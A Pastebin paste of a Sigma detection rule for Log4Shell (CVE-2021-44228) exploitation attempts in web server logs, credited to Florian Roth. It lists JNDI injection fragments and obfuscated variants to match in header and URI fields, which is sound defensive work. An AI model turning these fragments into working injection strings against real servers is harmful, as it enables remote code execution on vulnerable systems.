API tools faq
paste
talon_s2w

[TALON] log4shell sigmarule - kudos to Florian Roth

talon_s2w
Dec 13th, 2021
637
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.33 KB | None | 0 0
raw download clone embed print report
  1. title: Log4j RCE CVE-2021-44228 in Fields
  2. id: 9be472ed-893c-4ec0-94da-312d2765f654
  3. status: experimental
  4. description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
  5. author: Florian Roth
  6. date: 2021/12/10
  7. modified: 2021/12/12
  8. references:
  9. - https://www.lunasec.io/docs/blog/log4j-zero-day/
  10. - https://news.ycombinator.com/item?id=29504755
  11. - https://github.com/tangxiaofeng7/apache-log4j-poc
  12. - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
  13. - https://github.com/YfryTchsGD/Log4jAttackSurface
  14. - https://twitter.com/shutingrz/status/1469255861394866177?s=21
  15. tags:
  16. - attack.initial_access
  17. - attack.t1190
  18. logsource:
  19. category: webserver
  20. detection:
  21. selection:
  22. cs-User-Agent|contains:
  23. - '${jndi:ldap:/'
  24. - '${jndi:rmi:/'
  25. - '${jndi:ldaps:/'
  26. - '${jndi:dns:/'
  27. - '/$%7bjndi:'
  28. - '%24%7bjndi:'
  29. - '$%7Bjndi:'
  30. - '%2524%257Bjndi'
  31. - '%2F%252524%25257Bjndi%3A'
  32. - '${jndi:${lower:'
  33. - '${::-j}${'
  34. - '${jndi:nis'
  35. - '${jndi:nds'
  36. - '${jndi:corba'
  37. - '${jndi:iiop'
  38. - '${${env:BARFOO:-j}'
  39. - '${::-l}${::-d}${::-a}${::-p}'
  40. - '${base64:JHtqbmRp'
  41. user-agent|contains:
  42. - '${jndi:ldap:/'
  43. - '${jndi:rmi:/'
  44. - '${jndi:ldaps:/'
  45. - '${jndi:dns:/'
  46. - '/$%7bjndi:'
  47. - '%24%7bjndi:'
  48. - '$%7Bjndi:'
  49. - '%2524%257Bjndi'
  50. - '%2F%252524%25257Bjndi%3A'
  51. - '${jndi:${lower:'
  52. - '${::-j}${'
  53. - '${jndi:nis'
  54. - '${jndi:nds'
  55. - '${jndi:corba'
  56. - '${jndi:iiop'
  57. - '${${env:BARFOO:-j}'
  58. - '${::-l}${::-d}${::-a}${::-p}'
  59. - '${base64:JHtqbmRp'
  60. cs-uri|contains:
  61. - '${jndi:ldap:/'
  62. - '${jndi:rmi:/'
  63. - '${jndi:ldaps:/'
  64. - '${jndi:dns:/'
  65. - '/$%7bjndi:'
  66. - '%24%7bjndi:'
  67. - '$%7Bjndi:'
  68. - '%2524%257Bjndi'
  69. - '%2F%252524%25257Bjndi%3A'
  70. - '${jndi:${lower:'
  71. - '${::-j}${'
  72. - '${jndi:nis'
  73. - '${jndi:nds'
  74. - '${jndi:corba'
  75. - '${jndi:iiop'
  76. - '${${env:BARFOO:-j}'
  77. - '${::-l}${::-d}${::-a}${::-p}'
  78. - '${base64:JHtqbmRp'
  79. cs-referrer|contains:
  80. - '${jndi:ldap:/'
  81. - '${jndi:rmi:/'
  82. - '${jndi:ldaps:/'
  83. - '${jndi:dns:/'
  84. - '/$%7bjndi:'
  85. - '%24%7bjndi:'
  86. - '$%7Bjndi:'
  87. - '%2524%257Bjndi'
  88. - '%2F%252524%25257Bjndi%3A'
  89. - '${jndi:${lower:'
  90. - '${::-j}${'
  91. - '${jndi:nis'
  92. - '${jndi:nds'
  93. - '${jndi:corba'
  94. - '${jndi:iiop'
  95. - '${${env:BARFOO:-j}'
  96. - '${::-l}${::-d}${::-a}${::-p}'
  97. - '${base64:JHtqbmRp'
  98. condition: selection
  99. falsepositives:
  100. - Vulnerability scanning
  101. level: high
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!